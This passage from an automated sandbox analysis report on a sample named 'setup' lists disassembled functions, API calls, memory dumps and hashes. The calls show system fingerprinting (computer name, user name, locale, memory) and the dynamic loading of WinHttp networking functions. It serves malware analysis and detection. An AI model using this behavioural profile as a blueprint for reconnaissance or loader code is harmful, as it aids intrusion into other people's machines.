                                                                                                                          • GetSystemMetrics.USER32(0000000C), ref: 00C3DEFD
                                                                                                                          • GetSystemMetrics.USER32(00000002), ref: 00C3DF08
                                                                                                                          • GetSystemMetrics.USER32(00000003), ref: 00C3DF16
                                                                                                                          • GetDC.USER32(00000000), ref: 00C3DF24
                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00C3DF2F
                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C3DF3B
                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00C3DF47
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1031845853-0
                                                                                                                          • Opcode ID: 98510ff12606df09c56b4f3dd0b70b8e8bc5b6a858fbcedb6d1e880f95ab07a0
                                                                                                                          • Instruction ID: f96eb6a61486ccc18aae6c16f287bce5ffe455f46130cc349ee0b9c54d57d899
                                                                                                                          • Opcode Fuzzy Hash: 98510ff12606df09c56b4f3dd0b70b8e8bc5b6a858fbcedb6d1e880f95ab07a0
                                                                                                                          • Instruction Fuzzy Hash: FCF04431A40711ABE7001F71EC1DB6E3B60FB41742F09862AF202CA1D0EBB481218FC0
                                                                                                                          Function 0303084D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 187COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 867 303084d-3030892 call 30427b0 870 30308a0-30308f2 867->870 870->870 871 30308f4-30308fc 870->871 872 303091b-3030977 call 30427b0 871->872 873 30308fe-3030904 871->873 878 3030980-30309d1 872->878 874 3030910-3030919 873->874 874->872 874->874 878->878 879 30309d3-30309dd 878->879 880 30309fb-3030a32 GetComputerNameExA 879->880 881 30309df-30309e4 879->881 882 30309f0-30309f9 881->882 882->880 882->882
                                                                                                                          APIs
                                                                                                                          • GetComputerNameExA.KERNEL32(00000006,2E27282B,?), ref: 03030A0D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ComputerName
                                                                                                                          • String ID: &sjK$+('.
                                                                                                                          • API String ID: 3545744682-207329785
                                                                                                                          • Opcode ID: f96587cc0b21d7a254be4cf676f5d5727ddabfa226b7769d1e87c0ecb165053d
                                                                                                                          • Instruction ID: ecddced637af39d42bc0e96d53408e8f9244deb9c2f15190088e2fde5acdd0cd
                                                                                                                          • Opcode Fuzzy Hash: f96587cc0b21d7a254be4cf676f5d5727ddabfa226b7769d1e87c0ecb165053d
                                                                                                                          • Instruction Fuzzy Hash: EE5129B6651B029BD309CF29C894362FBE2FF96304F19865DC096C7790E778E505CB90
                                                                                                                          Function 0302F128 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 927 302f128-302f195 929 302f1a0-302f1b2 927->929 929->929 930 302f1b4-302f1b9 929->930 931 302f1bb-302f1bf 930->931 932 302f1cd 930->932 933 302f1c0-302f1c9 931->933 934 302f1d0-302f207 GetComputerNameExA 932->934 933->933 935 302f1cb 933->935 935->934
                                                                                                                          APIs
                                                                                                                          • GetComputerNameExA.KERNEL32(00000005,?,?), ref: 0302F1E3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ComputerName
                                                                                                                          • String ID: %8#$?26=
                                                                                                                          • API String ID: 3545744682-1344153340
                                                                                                                          • Opcode ID: 8169e16fa1142d7270bd8b252fba075420a2c5c694522361a19a1ceffa818467
                                                                                                                          • Instruction ID: 118099aa00bea658c634ab1dfe273898727e7dc41d231b452fdb399f158f5a06
                                                                                                                          • Opcode Fuzzy Hash: 8169e16fa1142d7270bd8b252fba075420a2c5c694522361a19a1ceffa818467
                                                                                                                          • Instruction Fuzzy Hash: FA119EB06056438BE719CF28D860762FBF1BF56350F488689C0969B386CB38D985CBA1
                                                                                                                          Function 010743B3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNEL32(00000000,?,?), ref: 01074445
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141412203.0000000001020000.00000040.10000000.00040000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_1020000_setup.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID: .dll
                                                                                                                          • API String ID: 1029625771-2738580789
                                                                                                                          • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                          • Instruction ID: 70ffa40f7727a0c779c159ed34459e5bbcd138345b650dbb7c9f254130efa7e2
                                                                                                                          • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                          • Instruction Fuzzy Hash: 3B210675E002959FEB62DF6CC844BAE7FE4EF01224F1841ACD985DBA42DB30E845CB54
                                                                                                                          Function 00C3E462 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C3F329: LeaveCriticalSection.KERNEL32(?,?,?,?,00C2F254,00000001), ref: 00C3F33D
                                                                                                                            • Part of subcall function 00C6FC3E: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,00C483B0,?,00CBB89C,00000002), ref: 00C6FC9F
                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C3E47F
                                                                                                                            • Part of subcall function 00C3DF50: TlsAlloc.KERNEL32 ref: 00C3DF6F
                                                                                                                            • Part of subcall function 00C3DF50: InitializeCriticalSection.KERNEL32(?), ref: 00C3DF80
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$AllocExceptionH_prolog3InitializeLeaveRaise
                                                                                                                          • String ID: PL
                                                                                                                          • API String ID: 4292405150-2418937307
                                                                                                                          • Opcode ID: d28def6d9ec15716545fbaec992c1789a1841765e2938c3675f8333f0bc2c874
                                                                                                                          • Instruction ID: e6b52cc8b1cb84d0a8b4cc947de5edaeaa177240e6500b13ea687963e8cb1b46
                                                                                                                          • Opcode Fuzzy Hash: d28def6d9ec15716545fbaec992c1789a1841765e2938c3675f8333f0bc2c874
                                                                                                                          • Instruction Fuzzy Hash: 46014C70A14256ABDF25AFB8EC5AF6D3661AF08750F104528F925CB2D1EFB0CE41DB90
                                                                                                                          Function 0300CDD6 Relevance: 3.1, APIs: 2, Instructions: 119COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CoInitializeEx.COMBASE(00000000,00000002), ref: 0300CDDA
                                                                                                                          • CoInitializeEx.COMBASE(00000000,00000002), ref: 0300CF2A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Initialize
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2538663250-0
                                                                                                                          • Opcode ID: 7ac7b9480eb1e705c23118f1475f6ff0d49cf91c24599ca895c3cd2af379b974
                                                                                                                          • Instruction ID: b86acc6df3843bddbd8fb705f60cbb57ab7be1766b1f9d780d836e6231edbb14
                                                                                                                          • Opcode Fuzzy Hash: 7ac7b9480eb1e705c23118f1475f6ff0d49cf91c24599ca895c3cd2af379b974
                                                                                                                          • Instruction Fuzzy Hash: A041C7B4D10B40AFD760AF399A0B7167EB4AB05210F508B1DF9F69A6C4E634A4198BD3
                                                                                                                          Function 01073005 Relevance: 1.6, APIs: 1, Instructions: 325memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0107307F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141412203.0000000001020000.00000040.10000000.00040000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_1020000_setup.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4275171209-0
                                                                                                                          • Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                          • Instruction ID: 0df9e3f1e929b6884cbbd900e64ed1278099b612c3bb946d74e5f3d168795683
                                                                                                                          • Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                          • Instruction Fuzzy Hash: E7B11631900706BBFB729E68CC40BABBBE8FF45300F044559E6D98A241DB31E551EBA9
                                                                                                                          Function 00C840E3 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,?,?,?,00C83F96,00000001,00000364,?,00000006,000000FF,?,?,00C77EA7,00C8494D), ref: 00C84124
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1279760036-0
                                                                                                                          • Opcode ID: 8b82d2b872100e31b8ef744148a3b56c1d895dbd3e825f1820c9c90dc65da0fb
                                                                                                                          • Instruction ID: eced42346b4dd367434914877695a3f926b29d42f6f7005fe5fd1fc4ded7c4b4
                                                                                                                          • Opcode Fuzzy Hash: 8b82d2b872100e31b8ef744148a3b56c1d895dbd3e825f1820c9c90dc65da0fb
                                                                                                                          • Instruction Fuzzy Hash: 71F02431205126A69B287BA2AC09B1F3B89AF607A8F198021F814A7094DA30DD4083A8
                                                                                                                          Function 0303535D Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: BlanketProxy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3890896728-0
                                                                                                                          • Opcode ID: c41c8463b1d9751a2eaf0cd259488997cd06c00a2e6b7d2aea1c067ed8eeb468
                                                                                                                          • Instruction ID: 360f61632754017531fb9061dadabd0196ab9adaccc83c220a2e0ba3fc302567
                                                                                                                          • Opcode Fuzzy Hash: c41c8463b1d9751a2eaf0cd259488997cd06c00a2e6b7d2aea1c067ed8eeb468
                                                                                                                          • Instruction Fuzzy Hash: 7AF0B7B4108702CFD314DF29C1A871ABBE1FB84344F018A0CE49A8B390C7B5A649CF82
                                                                                                                          Function 03033F97 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: BlanketProxy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3890896728-0
                                                                                                                          • Opcode ID: 0aed1fc47601a819a075bb952008010744057f6d234ac717bf910c55ad827481
                                                                                                                          • Instruction ID: 8336bd957c4e90e8c301247cc3ccd042b5a17f75632fc214711a8fbf81e8bfa9
                                                                                                                          • Opcode Fuzzy Hash: 0aed1fc47601a819a075bb952008010744057f6d234ac717bf910c55ad827481
                                                                                                                          • Instruction Fuzzy Hash: 4FF098B4109701CFE310DF28C1A471ABBF0FB85344F10890CE5998B3A0C7B6A949CF82
                                                                                                                          Function 00C6CC50 Relevance: 1.5, APIs: 1, Instructions: 17synchronizationCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,00000000,00000200,00000000,00000004), ref: 00C6CC69
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateMutex
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1964310414-0
                                                                                                                          • Opcode ID: c871672685aa6d07bf3f5ee28c48db1f90bc6f4afe862e3e503cc501134de142
                                                                                                                          • Instruction ID: 707cebaf79abcb4111f7fb247a205fabab3b9c09dde8a089971ab53c5aa32ada
                                                                                                                          • Opcode Fuzzy Hash: c871672685aa6d07bf3f5ee28c48db1f90bc6f4afe862e3e503cc501134de142
                                                                                                                          • Instruction Fuzzy Hash: 93D0127178473127E6B027583D46BCD25805B40FA3F150065FB8CAE3D1D1905D8143D6
                                                                                                                          Function 0300CF79 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0300CF8B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeSecurity
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 640775948-0
                                                                                                                          • Opcode ID: cae95e76f773ea82a9da4cb51fd867ac3dc1239113bbec488af77d77c0883166
                                                                                                                          • Instruction ID: e6082432b94cfe48fd7e288115f807cef033cf098447a35e49752e1e013c8bd4
                                                                                                                          • Opcode Fuzzy Hash: cae95e76f773ea82a9da4cb51fd867ac3dc1239113bbec488af77d77c0883166
                                                                                                                          • Instruction Fuzzy Hash: 50D092B83C5340BAE2746608AE23F1422105705F15F700609B322EE6C4CAD562008608
                                                                                                                          Function 0304183E Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetForegroundWindow.USER32 ref: 0304184C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ForegroundWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2020703349-0
                                                                                                                          • Opcode ID: 426eadd237631868474046a7017b75271e38cf88bea5c4506091a8074af025f0
                                                                                                                          • Instruction ID: 583e3ae8e9c534ad43a16dcb6b9fd604afb2ce6d3f218770b0f5233fda9696c7
                                                                                                                          • Opcode Fuzzy Hash: 426eadd237631868474046a7017b75271e38cf88bea5c4506091a8074af025f0
                                                                                                                          • Instruction Fuzzy Hash: 5BE017FDA03240EFCB04EFA4E6958B53B60AB8E6143140429E503D3349DB39EA02CA11
                                                                                                                          Function 0303F1D0 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(?,00000000,?,A2E6E197,03008AFA,929D7C9F), ref: 0303F1E0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1279760036-0
                                                                                                                          • Opcode ID: 6eaac7cde16df89ef72e31267f62d7492b14a496c5d0dd31f8c411d4df2f5bbc
                                                                                                                          • Instruction ID: 28dc36dbbf7369bcd6dc78f32201de32158fde0bbdf47e1888a68b840a1e8e8c
                                                                                                                          • Opcode Fuzzy Hash: 6eaac7cde16df89ef72e31267f62d7492b14a496c5d0dd31f8c411d4df2f5bbc
                                                                                                                          • Instruction Fuzzy Hash: 32C09231147221ABCB11BF14FC08FCB3F68EF86261F0604A1B4056B0B5D764BC92CAD8
                                                                                                                          Function 0303F203 Relevance: 1.5, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RtlFreeHeap.NTDLL(?,00000000), ref: 0303F20E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3298025750-0
                                                                                                                          • Opcode ID: 2d1fd6a41b5d7cdc65616dafc38552ff36371644d3fb0a55b06e569e3a48c4c1
                                                                                                                          • Instruction ID: 31548f1fdc19a02ad06c73183b6ee96414dc7a6d6de60068611ed138262afbd2
                                                                                                                          • Opcode Fuzzy Hash: 2d1fd6a41b5d7cdc65616dafc38552ff36371644d3fb0a55b06e569e3a48c4c1
                                                                                                                          • Instruction Fuzzy Hash: C1B01230143210AAC6117F10BC08FC63F24DF41232F110050B001180B5D7146891C688

                                                                                                                          Non-executed Functions

                                                                                                                          Function 00C01314 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 113libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C012F5: FreeLibrary.KERNEL32(00CC4DA4,?,00C0131E,00C01752,Mozilla/4.0,00000000), ref: 00C012FF
                                                                                                                          • LoadLibraryW.KERNEL32(Winhttp.dll,00C01752,Mozilla/4.0,00000000), ref: 00C01327
                                                                                                                          • GetProcAddress.KERNEL32(WinHttpOpen,?), ref: 00C0134F
                                                                                                                          • GetProcAddress.KERNEL32(WinHttpSetTimeouts), ref: 00C01361
                                                                                                                          • GetProcAddress.KERNEL32(WinHttpCrackUrl), ref: 00C01373
                                                                                                                          • GetProcAddress.KERNEL32(WinHttpConnect), ref: 00C01385
                                                                                                                          • GetProcAddress.KERNEL32(WinHttpOpenRequest), ref: 00C01397
                                                                                                                          • GetProcAddress.KERNEL32(WinHttpCloseHandle), ref: 00C013A9
                                                                                                                          • GetProcAddress.KERNEL32(WinHttpSetOption), ref: 00C013BB
                                                                                                                          • GetProcAddress.KERNEL32(WinHttpWriteData), ref: 00C013CD
                                                                                                                          • GetProcAddress.KERNEL32(WinHttpReadData), ref: 00C013DF
                                                                                                                          • GetProcAddress.KERNEL32(WinHttpSendRequest), ref: 00C013F1
                                                                                                                          • GetProcAddress.KERNEL32(WinHttpQueryHeaders), ref: 00C01403
                                                                                                                          • GetProcAddress.KERNEL32(WinHttpQueryDataAvailable), ref: 00C01415
                                                                                                                          • GetProcAddress.KERNEL32(WinHttpReceiveResponse), ref: 00C01427
                                                                                                                          • GetProcAddress.KERNEL32(WinHttpGetProxyForUrl), ref: 00C01439
                                                                                                                          • GetProcAddress.KERNEL32(WinHttpAddRequestHeaders), ref: 00C0144B
                                                                                                                          • GetProcAddress.KERNEL32(WinHttpGetIEProxyConfigForCurrentUser), ref: 00C0145D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                                                                          • String ID: WinHttpAddRequestHeaders$WinHttpCloseHandle$WinHttpConnect$WinHttpCrackUrl$WinHttpGetIEProxyConfigForCurrentUser$WinHttpGetProxyForUrl$WinHttpOpen$WinHttpOpenRequest$WinHttpQueryDataAvailable$WinHttpQueryHeaders$WinHttpReadData$WinHttpReceiveResponse$WinHttpSendRequest$WinHttpSetOption$WinHttpSetTimeouts$WinHttpWriteData$Winhttp.dll
                                                                                                                          • API String ID: 2449869053-1963091010
                                                                                                                          • Opcode ID: b71ab532b4c145786fc6329e90aa542211e8d3214becfc77499eb292cac57343
                                                                                                                          • Instruction ID: 793509d08c2ce23ca5a8fdb091b18891679414a2bbbac60298d10b19d1980107
                                                                                                                          • Opcode Fuzzy Hash: b71ab532b4c145786fc6329e90aa542211e8d3214becfc77499eb292cac57343
                                                                                                                          • Instruction Fuzzy Hash: A141E870841311AEDF2A7BA1FD68F9E3FE1EB05B46F09C42AE812462F1D7B44494DE41
                                                                                                                          Function 00C1F31B Relevance: 43.9, APIs: 9, Strings: 16, Instructions: 176stringtimeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,74E2F860,00000000,00000000), ref: 00C1F33A
                                                                                                                            • Part of subcall function 00C1EE67: FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,?,?,00C1F357,?,?), ref: 00C1EE79
                                                                                                                            • Part of subcall function 00C1EE67: FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 00C1EE8F
                                                                                                                            • Part of subcall function 00C1EE67: wsprintfW.USER32 ref: 00C1EED4
                                                                                                                            • Part of subcall function 00C1EBE3: lstrlenW.KERNEL32(00CC4EA8,?,00000000,74E2F860,00000000,?,?,00C1FC65,00000000,%s caused %s (0x%08p) in module %s at %04p:%08p.,?,00000000,?,Unknown,?,?), ref: 00C1EC04
                                                                                                                            • Part of subcall function 00C1EBE3: WriteFile.KERNEL32(?,00CC4EA8,00000000,?,?,00C1FC65,00000000,%s caused %s (0x%08p) in module %s at %04p:%08p.,?,00000000,?,Unknown,?,?), ref: 00C1EC11
                                                                                                                            • Part of subcall function 00C1EBE3: wvsprintfW.USER32(?,?,?), ref: 00C1EC2D
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000206), ref: 00C1F38D
                                                                                                                          • lstrcpyW.KERNEL32(?,Unknown), ref: 00C1F3AA
                                                                                                                            • Part of subcall function 00C1F2D1: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,00C1F57C,00000000,%d MBytes user address space free.), ref: 00C1F2E3
                                                                                                                            • Part of subcall function 00C1F2D1: GetProcAddress.KERNEL32(00000000), ref: 00C1F2EA
                                                                                                                            • Part of subcall function 00C1F2D1: GetCurrentProcess.KERNEL32(00000000,?,?,00C1F57C,00000000,%d MBytes user address space free.), ref: 00C1F2FD
                                                                                                                          • GetUserNameW.ADVAPI32(?,000000C6), ref: 00C1F3DA
                                                                                                                          • lstrcpyW.KERNEL32(?,Unknown), ref: 00C1F3EC
                                                                                                                          • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00C1F445
                                                                                                                          • GetUserDefaultUILanguage.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C1F46E
                                                                                                                          • GetLocaleInfoW.KERNEL32(00000400,00001001,?,00000055), ref: 00C1F48A
                                                                                                                          • GlobalMemoryStatus.KERNEL32(?), ref: 00C1F4C1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
